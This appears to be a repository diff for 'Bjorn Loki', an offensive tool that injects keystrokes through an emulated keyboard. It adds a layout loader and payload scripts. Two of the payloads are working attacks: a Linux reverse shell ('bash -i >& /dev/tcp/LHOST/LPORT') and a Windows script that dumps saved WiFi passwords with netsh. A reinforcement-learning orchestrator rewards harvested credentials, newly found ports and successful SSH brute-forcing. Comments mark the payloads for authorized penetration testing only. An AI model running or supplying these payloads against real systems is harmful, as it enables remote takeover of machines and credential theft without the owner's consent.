    with open(path, "r", encoding="utf-8") as f:
        data = json.load(f)
    _cache[name] = data
    logger.debug("Loaded keyboard layout '%s' (%d chars)", name, len(data))
    return data
def available() -> list:
    """List available layout names."""
    # Every *.json file in the layout directory is a layout; strip the
    # extension and return the names sorted alphabetically.
    return sorted(
        fname[:-5]
        for fname in os.listdir(_LAYOUT_DIR)
        if fname.endswith(".json")
    )

41
loki/layouts/us.json Normal file
View File

@@ -0,0 +1,41 @@
{
"a": [0, 4], "b": [0, 5], "c": [0, 6], "d": [0, 7],
"e": [0, 8], "f": [0, 9], "g": [0, 10], "h": [0, 11],
"i": [0, 12], "j": [0, 13], "k": [0, 14], "l": [0, 15],
"m": [0, 16], "n": [0, 17], "o": [0, 18], "p": [0, 19],
"q": [0, 20], "r": [0, 21], "s": [0, 22], "t": [0, 23],
"u": [0, 24], "v": [0, 25], "w": [0, 26], "x": [0, 27],
"y": [0, 28], "z": [0, 29],
"A": [2, 4], "B": [2, 5], "C": [2, 6], "D": [2, 7],
"E": [2, 8], "F": [2, 9], "G": [2, 10], "H": [2, 11],
"I": [2, 12], "J": [2, 13], "K": [2, 14], "L": [2, 15],
"M": [2, 16], "N": [2, 17], "O": [2, 18], "P": [2, 19],
"Q": [2, 20], "R": [2, 21], "S": [2, 22], "T": [2, 23],
"U": [2, 24], "V": [2, 25], "W": [2, 26], "X": [2, 27],
"Y": [2, 28], "Z": [2, 29],
"1": [0, 30], "2": [0, 31], "3": [0, 32], "4": [0, 33],
"5": [0, 34], "6": [0, 35], "7": [0, 36], "8": [0, 37],
"9": [0, 38], "0": [0, 39],
"!": [2, 30], "@": [2, 31], "#": [2, 32], "$": [2, 33],
"%": [2, 34], "^": [2, 35], "&": [2, 36], "*": [2, 37],
"(": [2, 38], ")": [2, 39],
"\n": [0, 40], "\r": [0, 40],
"\t": [0, 43],
" ": [0, 44],
"-": [0, 45], "_": [2, 45],
"=": [0, 46], "+": [2, 46],
"[": [0, 47], "{": [2, 47],
"]": [0, 48], "}": [2, 48],
"\\": [0, 49], "|": [2, 49],
";": [0, 51], ":": [2, 51],
"'": [0, 52], "\"": [2, 52],
"`": [0, 53], "~": [2, 53],
",": [0, 54], "<": [2, 54],
".": [0, 55], ">": [2, 55],
"/": [0, 56], "?": [2, 56]
}

View File

@@ -0,0 +1,9 @@
// Hello World — Test payload that types a message in Notepad (Windows)
// Flow: Win+R opens the Run dialog, launch notepad, then type two lines.
layout('us');
delay(1000);
press("GUI r");
delay(500);
type("notepad\n");
delay(1000);
type("Hello from Bjorn Loki!\n");
type("HID injection is working.\n");

View File

@@ -0,0 +1,13 @@
// Reverse Shell (Linux) — Bash reverse TCP. Set LHOST/LPORT before use.
// WARNING: For authorized penetration testing only.
// Assumes a GNOME-like desktop session where Ctrl+Alt+T opens a terminal.
var LHOST = "CHANGE_ME";
var LPORT = "4444";
layout('us');
delay(1000);
// Open terminal (Ctrl+Alt+T is common on Ubuntu/Debian)
press("CTRL ALT t");
delay(1500);
type("bash -i >& /dev/tcp/" + LHOST + "/" + LPORT + " 0>&1\n");

View File

@@ -0,0 +1,6 @@
// Rickroll — Opens browser to a famous URL (harmless test)
// Win+R accepts URLs directly and opens them in the default browser.
layout('us');
delay(1000);
press("GUI r");
delay(500);
type("https://www.youtube.com/watch?v=dQw4w9WgXcQ\n");

View File

@@ -0,0 +1,20 @@
// WiFi Profile Exfiltration (Windows) — Dumps saved WiFi passwords via netsh
// WARNING: For authorized penetration testing only.
layout('us');
delay(1000);
// Open CMD
press("GUI r");
delay(500);
type("cmd\n");
delay(1000);
// Export all WiFi profiles with keys to a file
type("netsh wlan export profile key=clear folder=C:\\Users\\Public\n");
// Long delay: netsh needs time to write one XML file per profile.
delay(3000);
// Show WiFi passwords inline
type("for /f \"tokens=2 delims=:\" %a in ('netsh wlan show profiles ^| findstr \"Profile\"') do @netsh wlan show profile name=%a key=clear 2>nul | findstr \"Key Content\"\n");
delay(5000);
console.log("WiFi profiles exported to C:\\Users\\Public");

View File

@@ -345,16 +345,12 @@ class Orchestrator:
return 0.0
# Base reward
reward = 50.0 if success else -5.0
if not success:
# Penalize time waste on failure
reward -= (duration * 0.1)
return reward
base_reward = 50.0 if success else -5.0
# ─────────────────────────────────────────────────────────
# Check for credentials found (high value!)
# Credential bonus (high value!)
# ─────────────────────────────────────────────────────────
credential_bonus = 0.0
try:
recent_creds = self.shared_data.db.query("""
SELECT COUNT(*) as cnt FROM creds
@@ -364,43 +360,123 @@ class Orchestrator:
if recent_creds and recent_creds[0]['cnt'] > 0:
creds_count = recent_creds[0]['cnt']
reward += 100 * creds_count # 100 per credential!
logger.info(f"RL: +{100*creds_count} reward for {creds_count} credentials")
credential_bonus = 100.0 * creds_count
logger.info(f"RL: +{credential_bonus:.0f} reward for {creds_count} credentials")
except Exception as e:
logger.error(f"Error checking credentials: {e}")
# ─────────────────────────────────────────────────────────
# Check for new services discovered
# Information gain reward (always positive, even on failure)
# ─────────────────────────────────────────────────────────
info_gain = 0.0
try:
# Compare ports before/after
ports_before = set(state_before.get('ports', []))
ports_after = set(state_after.get('ports', []))
new_ports = ports_after - ports_before
if new_ports:
reward += 15 * len(new_ports)
logger.info(f"RL: +{15*len(new_ports)} reward for {len(new_ports)} new ports")
info_gain += 15 * len(new_ports)
logger.info(f"RL: +{15*len(new_ports)} info_gain for {len(new_ports)} new ports")
except Exception as e:
logger.error(f"Error checking new ports: {e}")
# ─────────────────────────────────────────────────────────
# Time efficiency bonus/penalty
# ─────────────────────────────────────────────────────────
time_bonus = 0.0
if duration < 30:
reward += 20 # Fast execution bonus
time_bonus = 20.0
elif duration > 120:
reward -= 10 # Slow execution penalty
time_bonus = -10.0
# ─────────────────────────────────────────────────────────
# Action-specific bonuses
# ─────────────────────────────────────────────────────────
if action_name == "SSHBruteforce" and success:
# Extra bonus for SSH success (difficult action)
reward += 30
credential_bonus += 30.0
logger.debug(f"RL Reward calculated: {reward:.1f} for {action_name}")
return reward
# ─────────────────────────────────────────────────────────
# AI-02: Novelty bonus - reward exploring un-tried action+host combos
# ─────────────────────────────────────────────────────────
novelty_bonus = 0.0
try:
attempt_count = self._get_action_attempt_count(action_name, mac)
if attempt_count <= 1:
novelty_bonus = 10.0 # first try bonus
elif attempt_count <= 3:
novelty_bonus = 5.0 # still exploring
except Exception as e:
logger.debug(f"Novelty bonus calculation error: {e}")
# ─────────────────────────────────────────────────────────
# AI-02: Diminishing returns - penalize repeating same failed action
# ─────────────────────────────────────────────────────────
repeat_penalty = 0.0
if not success:
try:
consecutive_fails = self._get_consecutive_fail_count(action_name, mac)
repeat_penalty = min(consecutive_fails * 5.0, 25.0) # cap at -25
except Exception as e:
logger.debug(f"Repeat penalty calculation error: {e}")
# ─────────────────────────────────────────────────────────
# AI-02: Duration-proportional partial credit for failed actions
# ─────────────────────────────────────────────────────────
partial_credit = 0.0
if not success and duration > 5:
partial_credit = min(duration * 0.5, 10.0) # cap at +10
total_reward = (
base_reward
+ credential_bonus
+ info_gain
+ time_bonus
+ novelty_bonus
- repeat_penalty
+ partial_credit
)
logger.debug(
f"RL Reward: {total_reward:.1f} for {action_name} "
f"(base={base_reward:.0f} cred={credential_bonus:.0f} info={info_gain:.0f} "
f"time={time_bonus:.0f} novelty={novelty_bonus:.0f} "
f"repeat_pen={repeat_penalty:.0f} partial={partial_credit:.1f})"
)
return total_reward
def _get_action_attempt_count(self, action_name: str, mac: str) -> int:
"""AI-02: Get the total number of times this action was tried on this host."""
try:
rows = self.shared_data.db.query(
"SELECT COUNT(*) AS cnt FROM ml_features WHERE action_name=? AND mac_address=?",
(action_name, mac),
)
return int(rows[0]['cnt']) if rows else 0
except Exception as e:
logger.debug(f"_get_action_attempt_count error: {e}")
return 0
def _get_consecutive_fail_count(self, action_name: str, mac: str) -> int:
"""AI-02: Count consecutive failures for this action+host, most recent first."""
try:
rows = self.shared_data.db.query(
"""
SELECT success FROM ml_features
WHERE action_name=? AND mac_address=?
ORDER BY timestamp DESC
LIMIT 10
""",
(action_name, mac),
)
count = 0
for r in rows:
if int(r['success']) == 0:
count += 1
else:
break
return count
except Exception as e:
logger.debug(f"_get_consecutive_fail_count error: {e}")
return 0
def execute_queued_action(self, queued_action: Dict[str, Any]) -> bool:
"""Execute a single queued action with RL integration"""
@@ -568,6 +644,16 @@ class Orchestrator:
self.shared_data.db.update_queue_status(queue_id, 'failed')
logger.warning(f"Action {action_name} failed for {ip}")
# Circuit breaker feedback (ORCH-01)
try:
cb_threshold = int(getattr(self.shared_data, 'circuit_breaker_threshold', 3))
if success:
self.shared_data.db.record_circuit_breaker_success(action_name, mac)
else:
self.shared_data.db.record_circuit_breaker_failure(action_name, mac, threshold=cb_threshold)
except Exception as cb_err:
logger.debug(f"Circuit breaker update skipped: {cb_err}")
except Exception as e:
logger.error(f"Error executing action {action_name}: {e}")
self.shared_data.db.update_queue_status(queue_id, 'failed', str(e))
@@ -633,6 +719,23 @@ class Orchestrator:
logger.debug(f"Features logged for {action_name} (mode={self.shared_data.operation_mode})")
# AI-03: Feed reward to AI engine for performance tracking
if self.ai_engine:
try:
self.ai_engine.record_reward(reward)
except Exception as e:
logger.debug(f"AI reward recording skipped: {e}")
# AI-04: Update bootstrap scores for cold-start learning
if self.ai_engine:
try:
state_after = self._build_host_state(mac)
ports = set(state_after.get('ports', []))
port_profile = self.ai_engine._detect_port_profile(ports)
self.ai_engine.update_bootstrap(action_name, port_profile, reward)
except Exception as e:
logger.debug(f"Bootstrap update skipped: {e}")
except Exception as e:
logger.info_throttled(
f"Feature logging skipped: {e}",
@@ -674,6 +777,15 @@ class Orchestrator:
# Execute the action
self.execute_queued_action(next_action)
# If exit was requested during execution, reset status
# immediately so the UI doesn't stay on the finished action.
if self.shared_data.orchestrator_should_exit:
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
self.shared_data.active_action = None
else:
# IDLE mode
idle_time += 1
@@ -704,6 +816,16 @@ class Orchestrator:
time.sleep(self._loop_error_backoff)
self._loop_error_backoff = min(self._loop_error_backoff * 2.0, 10.0)
# ── Reset status immediately upon exit ──────────────────────
# This ensures the UI shows IDLE as soon as the orchestrator stops,
# regardless of whether Bjorn.stop_orchestrator()'s join() timed out.
self.shared_data.bjorn_orch_status = "IDLE"
self.shared_data.bjorn_status_text = "IDLE"
self.shared_data.bjorn_status_text2 = ""
self.shared_data.action_target_ip = ""
self.shared_data.active_action = None
self.shared_data.update_status("IDLE", "")
# Cleanup on exit (OUTSIDE while loop)
if self.scheduler:
self.scheduler.stop()

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 158 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 134 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 446 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 438 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 670 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 938 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 670 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 4.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.4 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 134 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 670 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 950 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.0 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 29 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 174 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.3 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 18 KiB

Some files were not shown because too many files have changed in this diff Show More